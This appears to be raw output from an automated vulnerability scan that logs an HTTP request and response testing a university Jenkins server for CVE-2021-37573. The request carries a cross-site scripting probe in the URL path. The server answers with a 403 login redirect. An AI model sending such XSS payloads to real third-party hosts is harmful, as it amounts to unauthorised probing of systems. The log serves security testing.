[CVE-2021-37573] Dumped HTTP request for https://pipeline.eresearch.unimelb.edu.au/te<img+src=x+onerror=alert(42)>st


GET /te%3Cimg%20src=x%20onerror=alert(42)%3Est HTTP/1.1
Host: pipeline.eresearch.unimelb.edu.au
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


[CVE-2021-37573] Dumped HTTP response https://pipeline.eresearch.unimelb.edu.au/te<img+src=x+onerror=alert(42)>st

HTTP/1.1 403 Forbidden
Connection: close
Content-Type: text/html;charset=utf-8
Date: Wed, 06 Aug 2025 15:18:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Server: Jetty(12.0.22)
Set-Cookie: JSESSIONID.f9da2665=node01klcw129ryq591j1t7i7dldep22927.node0; Path=/; Secure; HttpOnly; SameSite=Lax
Strict-Transport-Security: max-age=63072000
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Hudson: 1.395
X-Jenkins: 2.516.1
X-Jenkins-Session: 529aec02

<html><head><meta http-equiv='refresh' content='1;url=/login?from=%2Fte%253Cimg%2520src%3Dx%2520onerror%3Dalert%2842%29%253Est'/><script id='redirect' data-redirect-url='/login?from=%2Fte%253Cimg%2520src%3Dx%2520onerror%3Dalert%2842%29%253Est' src='/static/529aec02/scripts/redirect.js'></script></head><body style='background-color:white; color:white;'>
Authentication required
<!--
-->

</body></html>                                                                                                                                                                                                                                                                                                            
